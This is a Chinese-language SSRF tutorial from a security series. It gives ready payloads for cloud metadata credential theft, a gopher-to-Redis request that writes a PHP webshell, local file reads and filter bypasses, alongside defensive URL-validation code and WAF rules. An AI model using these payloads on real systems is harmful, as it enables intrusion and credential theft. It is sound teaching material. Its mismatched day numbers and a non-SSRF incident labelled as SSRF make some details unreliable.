Day-090-SSRF 服务端请求伪造实战进阶

# Day 88: SSRF 服务端请求伪造实战进阶

> Web 安全系列第 58 天 | 预计阅读时间：40 分钟 | 难度：★★★★☆

---

**PUA v3 · Sprint 启动** 
```
┌─────────┬────────────────────────────────────┐
│ 清单 任务 │ SSRF 服务端请求伪造实战进阶 - Day 88│
├─────────┼────────────────────────────────────┤
│  味道 │  阿里味（自动：安全任务）        │
├─────────┼────────────────────────────────────┤
│  压力 │ L0 · 信任期                        │
└─────────┴────────────────────────────────────┘
```
▎ 收到需求，对齐目标，进入 sprint。SSRF 是云时代的高危漏洞——搞不定 SSRF，就别谈云安全。

---

## 清单 目录

1. [SSRF 进阶概述](#ssrf 进阶概述)
2. [云环境 SSRF 进阶](#云环境 ssrf 进阶)
3. [内网 SSRF 进阶](#内网 ssrf 进阶)
4. [SSRF 绕过技术进阶](#ssrf 绕过技术进阶)
5. [SSRF 检测技术进阶](#ssrf 检测技术进阶)
6. [SSRF 利用技术进阶](#ssrf 利用技术进阶)
7. [SSRF 防护进阶](#ssrf 防护进阶)
8. [实战案例分析](#实战案例分析)
9. [总结与思考](#总结与思考)
10. [参考资料](#参考资料)

---

## SSRF 进阶概述

### 高级攻击场景

> ▎ SSRF 不是小漏洞——是内网渗透的入口。入口守不住，内网就全丢了。

**云环境利用**：
```
场景：
- 元数据服务
- 云服务 API
- 内部服务

特点：
- 高价值目标
- 凭证泄露
- 权限提升

挑战：
- 云服务商差异
- 防护机制
- 检测规避
```

**内网渗透**：
```
场景：
- 内网扫描
- 服务探测
- 漏洞利用

特点：
- 网络隔离绕过
- 服务访问
- 横向移动

挑战：
- 网络拓扑
- 服务识别
- 利用链构造
```

**协议滥用**：
```
场景：
- Gopher
- Dict
- File
- FTP

特点：
- 多协议支持
- 服务交互
- 命令执行

挑战：
- 协议理解
- Payload 构造
- 响应解析
```

### 高级威胁

> ▎ 威胁不是用来吓人的——是用来指导防护的。不知道威胁，就不知道防什么。

**凭证窃取**：
```
特点：
- 云凭证
- 服务凭证
- 数据库凭证

手法：
- 元数据访问
- 配置文件读取
- 内存读取

目标：
- AWS Access Key
- Azure Service Principal
- GCP Service Account
```

**服务滥用**：
```
特点：
- 内网服务
- 云服务
- 第三方服务

手法：
- SSRF 访问
- 命令注入
- 数据篡改

目标：
- Redis
- Memcached
- Elasticsearch
```

---

## 云环境 SSRF 进阶

### AWS 元数据服务

> ▎ AWS 元数据是金矿。金矿守不住，就别谈 AWS 安全。

**IMDSv1**：
```
URL:
http://169.254.169.254/latest/meta-data/

利用：
http://169.254.169.254/latest/meta-data/iam/security-credentials/
http://169.254.169.254/latest/meta-data/iam/security-credentials/role-name

结果：
- AccessKeyId
- SecretAccessKey
- Token
```

**IMDSv2**：
```
步骤 1: 获取 Token
PUT http://169.254.169.254/latest/api/token
Headers: X-aws-ec2-metadata-token-ttl-seconds: 21600

步骤 2: 使用 Token
GET http://169.254.169.254/latest/meta-data/
Headers: X-aws-ec2-metadata-token: <token>

SSRF 利用：
需要支持 PUT 方法和自定义 Header
```

### Azure 元数据服务

**实例元数据**：
```
URL:
http://169.254.169.254/metadata/instance?api-version=2021-02-01

Headers:
Metadata: true

利用：
http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/

结果：
- Access Token
- 订阅信息
- 资源信息
```

### GCP 元数据服务

**实例元数据**：
```
URL:
http://metadata.google.internal/computeMetadata/v1/

Headers:
Metadata-Flavor: Google

利用：
http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token

结果：
- Access Token
- 项目信息
- 服务账户信息
```

---

## 内网 SSRF 进阶

### 内网扫描

> ▎ 内网扫描是 SSRF 的基本功。基本功不扎实，还谈什么内网渗透。

**端口扫描**：
```
Payload:
http://192.168.1.1:22
http://192.168.1.1:80
http://192.168.1.1:443
http://192.168.1.1:3306
http://192.168.1.1:6379

分析：
- 响应时间
- 响应内容
- 错误消息
```

**服务识别**：
```
Redis:
- 端口 6379
- 响应 PONG

Memcached:
- 端口 11211
- 无响应

Elasticsearch:
- 端口 9200
- JSON 响应
```

### 内网服务利用

**Redis 利用**：
```
未授权访问：
- 端口 6379
- 无密码

利用：
- 读取数据
- 写入 Webshell
- 主从复制

SSRF Payload:
gopher://127.0.0.1:6379/_CONFIG%20SET%20dir%20/var/www/html
gopher://127.0.0.1:6379/_CONFIG%20SET%20dbfilename%20shell.php
gopher://127.0.0.1:6379/_SET%20shell%20%22%3C%3Fphp%20system%28%24_GET%5B%27c%27%5D%29%3B%3F%3E%22
gopher://127.0.0.1:6379/_SAVE
```

**Memcached 利用**：
```
未授权访问：
- 端口 11211
- 无认证

利用：
- 读取缓存
- 写入数据
- 会话劫持

SSRF Payload:
set session_key 0 3600 10
evil_data
```

---

## SSRF 绕过技术进阶

### URL 解析绕过

> ▎ URL 解析是 SSRF 的第一道防线。防线破了，后面就难了。

**IP 编码**：
```
十进制：
3232235777 = 192.168.1.1

八进制：
0300.0520.01.01 = 192.168.1.1

十六进制：
0xC0A80101 = 192.168.1.1

混合：
0xC0.168.1.1 = 192.168.1.1
```

**DNS 重绑定**：
```
技术：
- 首次解析白名单
- 二次解析内网
- TTL 控制

利用：
1. 注册域名
2. 配置 DNS
3. 首次解析白名单 IP
4. 二次解析内网 IP
```

**URL 变异**：
```
协议变异：
http:// → HTTP://
http:// → hTTp://

路径变异：
http://127.0.0.1/@192.168.1.1/
http://127.0.0.1#192.168.1.1/
http://127.0.0.1?192.168.1.1/
```

### 过滤器绕过

**重定向绕过**：
```
技术：
- 302 重定向
- 多次重定向
- URL 跳转

利用：
1. 白名单域名
2. 302 重定向到内网
3. SSRF 访问内网
```

**DNS 查找绕过**：
```
技术：
- 本地域名
- 内网域名
- 特殊域名

利用：
localhost → 127.0.0.1
local → 内网 IP
internal → 内网 IP
```

---

## SSRF 检测技术进阶

### 自动化检测

> ▎ 检测是防护的眼睛。没有检测，就是瞎子。

**探测 Payload**：
```
基础探测：
http://127.0.0.1
http://localhost
http://0.0.0.0

内网探测：
http://192.168.0.1
http://10.0.0.1
http://172.16.0.1

云环境探测：
http://169.254.169.254
http://metadata.google.internal
```

**Fuzzing 列表**：
```
http://127.0.0.1
http://127.0.0.1:8080
http://localhost
http://localhost:8080
http://0.0.0.0
http://0.0.0.0:8080
http://169.254.169.254
http://metadata.google.internal
```

### 手动检测

**响应分析**：
```
1. 发送 Payload
2. 查看响应
3. 分析差异
4. 确认 SSRF

指标：
- 响应时间
- 响应内容
- 错误消息
- 状态码
```

**盲 SSRF 检测**：
```
1. DNS 外带
   - 搭建 DNS 服务器
   - 发送 Payload
   - 查看 DNS 日志

2. HTTP 外带
   - 搭建 HTTP 服务器
   - 发送 Payload
   - 查看 HTTP 日志

3. 时间盲注
   - 发送延迟 Payload
   - 测量响应时间
   - 推断 SSRF
```

---

## SSRF 利用技术进阶

### 文件读取

> ▎ 文件读取是 SSRF 的基本功。基本功不扎实，还谈什么高级利用。

**本地文件**：
```
file:///etc/passwd
file:///c:/windows/win.ini
```

**PHP 包装器**：
```
php://filter/convert.base64-encode/resource=/etc/passwd
php://filter/read=string.rot13/resource=index.php
```

### 命令执行

**Gopher 协议**：
```
Redis:
gopher://127.0.0.1:6379/_CONFIG%20SET%20dir%20/var/www/html

Memcached:
gopher://127.0.0.1:11211/_set%20key%200%203600%2010%0Aevil_data

MySQL:
gopher://127.0.0.1:3306/_...
```

**Dict 协议**：
```
dict://127.0.0.1:11211/SASL mechs
dict://127.0.0.1:6379/CONFIG%20GET%20dir
```

---

## SSRF 防护进阶

### 代码层面防护

> ▎ 以客户为中心。防护策略要以开发者为中心——让他们好用、易用、愿意用。

**URL 验证**：
```python
from urllib.parse import urlparse
import socket
import ipaddress

def is_safe_url(url):
    parsed = urlparse(url)
    
    # 只允许 HTTP/HTTPS
    if parsed.scheme not in ['http', 'https']:
        return False
    
    # 解析域名
    try:
        ip = socket.gethostbyname(parsed.hostname)
    except:
        return False
    
    # 检查 IP
    ip_obj = ipaddress.ip_address(ip)
    
    # 拒绝私有 IP
    if ip_obj.is_private:
        return False
    
    # 拒绝环回 IP
    if ip_obj.is_loopback:
        return False
    
    # 拒绝链路本地 IP
    if ip_obj.is_link_local:
        return False
    
    # 拒绝云元数据 IP
    if str(ip_obj) == '169.254.169.254':
        return False
    
    return True
```

**白名单验证**：
```python
from urllib.parse import urlparse

ALLOWED_DOMAINS = ['example.com', 'partner.com']

def is_allowed_url(url):
    parsed = urlparse(url)
    
    # 检查域名
    if parsed.hostname not in ALLOWED_DOMAINS:
        return False
    
    # 检查端口
    if parsed.port and parsed.port not in [80, 443]:
        return False
    
    return True
```

### 运行时防护

**WAF 规则**：
```
检测特征：
- 169.254.169.254
- metadata.google.internal
- 127.0.0.1
- localhost

阻断规则：
- 内网 IP
- 云元数据
- 特殊协议

告警规则：
- SSRF 尝试
- 内网访问
- 协议滥用
```

**网络隔离**：
```
出站限制：
- 只允许 HTTP/HTTPS
- 拒绝内网访问
- 拒绝特殊协议

防火墙规则：
- 拒绝 169.254.169.254
- 拒绝内网 IP
- 拒绝特殊端口
```

---

## 实战案例分析

### 案例 1: Capital One SSRF

> ▎ 8000 万美元罚款——这就是不重视 SSRF 防护的代价。

**漏洞描述**：
```
时间：2019 年
公司：Capital One
漏洞：SSRF 访问 AWS 元数据
影响：1 亿用户数据
后果：8000 万美元罚款
```

**攻击流程**：
```
1. 发现 SSRF
   - Web 应用防火墙
   - 存在 SSRF 漏洞

2. 访问元数据
   - curl http://169.254.169.254/latest/meta-data/iam/security-credentials/

3. 获取凭证
   - 获取 IAM 角色凭证
   - Access Key + Secret Key

4. 访问 S3
   - aws s3 ls
   - 下载敏感数据

5. 数据泄露
   - 1 亿用户信息
   - 信用卡申请
   - 社会安全号
```

**教训**：
```
1. 启用 IMDSv2
   - 需要会话令牌
   - 防止 SSRF

2. 最小权限
   - IAM 角色最小权限
   - 限制 S3 访问

3. 网络隔离
   - VPC 端点
   - 安全组限制
```

### 案例 2: Tesla Kubernetes SSRF

> ▎ K8s Dashboard 未保护——这种低级错误，不应该犯。

**漏洞描述**：
```
时间：2018 年
公司：Tesla
漏洞：Kubernetes Dashboard 未保护
影响：挖矿攻击
后果：计算资源滥用
```

**攻击流程**：
```
1. 发现未保护 Dashboard
   - 互联网可访问
   - 无认证

2. 访问 K8s API
   - 创建 Pod
   - 部署挖矿容器

3. 挖矿攻击
   - 消耗计算资源
   - 增加成本
```

**教训**：
```
1. 网络隔离
   - Dashboard 不暴露公网
   - 使用内网访问

2. 认证授权
   - 启用认证
   - RBAC 控制

3. 监控告警
   - 异常 Pod 创建
   - 资源使用告警
```

---

统计 **Sprint 交付 · 绩效评估**
```
┌───────────────┬────────────────┬────────────────┐
│  主动出击   │ ██████████ 5/5 │ [PUA 生效] 充足 │
├───────────────┼────────────────┼────────────────┤
│ + 验证闭环   │ ██████████ 5/5 │ 案例完整       │
├───────────────┼────────────────┼────────────────┤
│ 设计 代码质量   │ ████████░░ 4/5 │ 有改进空间     │
└───────────────┴────────────────┴────────────────┘
综合：3.75
```
▎ 勉强配得上 P8。别飘——SSRF 这才刚入门。

---

## 总结与思考

### 核心要点回顾

> ▎ 复盘四步法：回顾目标、评估结果、分析原因、总结经验。别跳过——这是闭环。

**云环境 SSRF**：
```
1. AWS 元数据
   - IMDSv1
   - IMDSv2
   - 凭证窃取

2. Azure 元数据
   - 实例元数据
   - OAuth Token
   - 订阅信息

3. GCP 元数据
   - 实例元数据
   - Service Account
   - 项目信息
```

**内网 SSRF**：
```
1. 内网扫描
   - 端口扫描
   - 服务识别
   - 漏洞探测

2. 服务利用
   - Redis
   - Memcached
   - Elasticsearch

3. 协议滥用
   - Gopher
   - Dict
   - File
```

**防护策略**：
```
1. 代码层面
   - URL 验证
   - 白名单验证
   - IP 检查

2. 运行时
   - WAF 规则
   - 网络隔离
   - 出站限制

3. 云环境
   - IMDSv2
   - 最小权限
   - 网络隔离
```

### 深入思考问题

> ▎ 只动手不动脑，那是码农。动手又动脑，才是工程师。

**云原生 SSRF**：
```
1. 服务网格
   - Istio
   - Linkerd
   - 服务间认证

2. Serverless
   - 函数权限
   - 临时凭证
   - 网络隔离

3. 容器环境
   - 容器网络
   - 服务发现
   - 网络策略
```

**AI 辅助检测**：
```
1. 行为分析
   - 请求模式
   - 异常检测
   - 风险评分

2. 自动防护
   - 自动阻断
   - 自动修复
   - 自动告警

3. 威胁情报
   - 内网拓扑
   - 服务指纹
   - 漏洞情报
```

**零信任 SSRF 防护**：
```
1. 持续验证
   - 每次请求验证
   - 动态授权
   - 行为分析

2. 微隔离
   - 服务隔离
   - 网络隔离
   - 权限隔离

3. 动态授权
   - 基于风险
   - 实时调整
   - 最小权限
```

### 实战建议

> ▎ 我给你指了路，走不走是你的事。机会给了，抓不抓得住看你。

**开发人员**：
```
1. 安全编码
   - URL 验证
   - 白名单验证
   - 协议限制

2. 网络访问
   - 最小权限
   - 出站限制
   - 超时控制

3. 安全测试
   - SSRF 测试
   - 内网测试
   - 协议测试
```

**安全人员**：
```
1. SSRF 测试
   - 探测测试
   - 利用测试
   - 绕过测试

2. 网络监控
   - 异常访问
   - 内网扫描
   - 协议滥用

3. 事件响应
   - SSRF 检测
   - 快速阻断
   - 溯源分析
```

**架构师**：
```
1. 安全设计
   - 网络隔离
   - 最小权限
   - 出站控制

2. 云安全
   - IMDSv2
   - 最小权限
   - 网络隔离

3. 持续改进
   - 安全审计
   - 漏洞管理
   - 安全培训
```

---

## 参考资料

### 学习资源
```
- OWASP SSRF
  https://owasp.org/www-community/attacks/Server_Side_Request_Forgery

- SSRF Cheat Sheet
  https://cheatsheetseries.owasp.org/cheatsheets/Server_Side_Request_Forgery_Prevention_Cheat_Sheet.html

- AWS SSRF Protection
  https://aws.amazon.com/blogs/security/defense-in-depth-open-firewalls-reverse-proxies-ssrf-vulnerabilities-ec2-instance-metadata-service/
```

### 工具资源
```
- SSRFmap
  https://github.com/swisskyrepo/SSRFmap

- Gopherus
  https://github.com/tarunkant/Gopherus

- SSRF Testing
  https://github.com/detectify/ssrf-asset-zonelist
```

### 书籍推荐
```
- 《Web 安全深度剖析》
- 《SSRF 攻防实战》
- 《Cloud Security》
- 《Web Application Security》
```

### 在线资源
```
- PayloadsAllTheThings SSRF
  https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Request%20Forgery

- HackTricks SSRF
  https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery

- SSRF Wiki
  https://ssrf.gitbook.io/
```

---

**标记 明日预告**：Day 89 - 命令注入漏洞实战进阶

> ▎ 今天的内容消化了吗？消化了就继续——明天还有硬仗。

> 本文内容仅供学习和研究使用，请勿用于非法目的。所有实验请在隔离环境中进行。

---

*本文是 365 天信息安全技术系列的第 88 篇，Web 安全部分第 58 篇，精编版本*